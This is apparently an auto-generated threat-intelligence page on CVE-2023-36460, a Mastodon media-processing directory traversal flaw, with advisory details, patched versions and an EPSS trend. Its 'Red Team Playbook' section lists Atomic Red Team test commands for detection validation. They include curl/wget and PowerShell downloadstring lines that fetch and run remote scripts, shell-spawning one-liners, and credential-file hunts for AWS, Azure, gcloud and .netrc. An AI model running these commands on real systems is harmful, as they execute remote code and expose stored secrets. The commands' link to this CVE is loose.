CVE-2023-36460
Overview
This vulnerability is a directory traversal flaw (CWE-22) in Mastodon's media processing component. It arises from improper validation of file paths when handling crafted media files, enabling the creation or overwriting of arbitrary files on the server. The affected functionality resides in the media processing code responsible for handling user-uploaded media content.
Vulnerability Description
Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 3.5.0 and prior to versions 3.5.9, 4.0.5, and 4.1.3, attackers using carefully crafted media files can cause Mastodon's media processing code to create arbitrary files at any location. This allows attackers to create and overwrite any file Mastodon has access to, allowing Denial of Service and arbitrary Remote Code Execution. Versions 3.5.9, 4.0.5, and 4.1.3 contain a patch for this issue.
Impact
An attacker with at least limited privileges (PR:L) can leverage this vulnerability remotely (AV:N) without user interaction (UI:N) to create or overwrite files anywhere Mastodon has access. This can lead to Denial of Service by corrupting critical files or arbitrary Remote Code Execution by placing malicious code. The vulnerability affects confidentiality, integrity, and availability (C:H/I:H/A:H) of the system, enabling potential full compromise of the Mastodon server environment.
Solution
Apply the patches provided in Mastodon versions 3.5.9, 4.0.5, or 4.1.3 as detailed in the official security advisory GHSA-9928-3cp5-93fm (https://github.com/mastodon/mastodon/security/advisories/GHSA-9928-3cp5-93fm). The advisory and associated commits (e.g., dc8f1fbd976ae544720a4e07120d9a91b2722440) contain the specific fixes to the media processing code. Users should upgrade to one of these patched versions promptly to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Mastodon social network server arises from improper handling of media files, specifically in the media processing code. This flaw allows attackers to craft malicious media files that can manipulate the server into creating or overwriting files at arbitrary locations within the system. The affected versions, specifically those prior to 3.5.9, 4.0.5, and 4.1.3, lack adequate validation and sanitization of file paths, enabling an attacker to exploit this weakness. By leveraging this vulnerability, an attacker can execute arbitrary file operations, leading to severe consequences such as Denial of Service (DoS) and remote code execution.
Attack vectors for this vulnerability are primarily centered around the submission of crafted media files to the Mastodon server. An attacker could upload a malicious image or video file that triggers the vulnerability during processing. Once the server processes the file, it could inadvertently create or overwrite critical system files, potentially altering configurations or injecting malicious scripts. This exploitation could be executed with minimal sophistication, making it accessible to a wide range of attackers, from script kiddies to more advanced threat actors. The ease of exploitation, combined with the potential for significant impact, makes this vulnerability particularly concerning.
The real-world implications of this vulnerability are profound, especially for organizations relying on Mastodon for social networking. A successful attack could lead to service outages, disrupting communication and engagement for users. Additionally, the ability to execute arbitrary code poses a direct threat to the integrity and confidentiality of the server's data. For businesses, this could result in reputational damage, loss of user trust, and potential legal ramifications if sensitive data is compromised. Furthermore, the financial impact could be substantial, considering the costs associated with incident response, recovery, and potential regulatory fines.
To detect and mitigate this vulnerability, organizations should prioritize updating their Mastodon installations to the patched versions as soon as possible. Regularly monitoring for updates and applying security patches is crucial in maintaining a secure environment. Additionally, implementing robust input validation and sanitization measures for media uploads can help prevent exploitation. Organizations should also consider employing intrusion detection systems (IDS) to monitor for unusual file creation or modification activities that could indicate an attempted attack. Conducting regular security audits and penetration testing can further enhance the security posture by identifying and addressing potential vulnerabilities before they can be exploited.
In conclusion, the vulnerability in Mastodon highlights the critical importance of secure coding practices and the need for continuous vigilance in software maintenance. The potential for arbitrary file creation and remote code execution poses significant risks to organizations utilizing this platform. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such vulnerabilities. Proactive detection and mitigation strategies are essential to safeguard against the evolving threat landscape in the realm of cybersecurity.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) for CVE-2023-36460, rising by approximately 13.6% to a current score that places it near the 98th percentile. This upward trend, although not rapid, indicates growing confidence in the likelihood of exploitation attempts targeting the Mastodon vulnerability. Our telemetry shows a steady increase in interest from threat actors, reflecting heightened attention to this critical weakness in media file processing that enables arbitrary file creation and remote code execution. While no new exploit techniques or proof-of-concept code have surfaced recently, the rising EPSS suggests that exploitation efforts may become more frequent or sophisticated in the near term. For defenders, this shift underscores the need for increased vigilance and prioritization of patch management, as the elevated risk level raises the probability of successful attacks exploiting this vulnerability in operational environments.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Joinmastodon | Mastodon | All |
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*
|
|
|
Joinmastodon | Mastodon | All |
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*
|
|
|
Joinmastodon | Mastodon | All |
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36460 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/mastodon/mastodon/security/advisories/GHSA-9928-3cp5-93fm |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mastodon/mastodon/commit/dc8f1fbd976ae544720a4e07120d9a91b2722440 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mastodon/mastodon/releases/tag/v3.5.9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mastodon/mastodon/releases/tag/v4.0.5 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mastodon/mastodon/releases/tag/v4.1.3 |
| openwall.com |
GitHub CVE
|
http://www.openwall.com/lists/oss-security/2023/07/06/4 |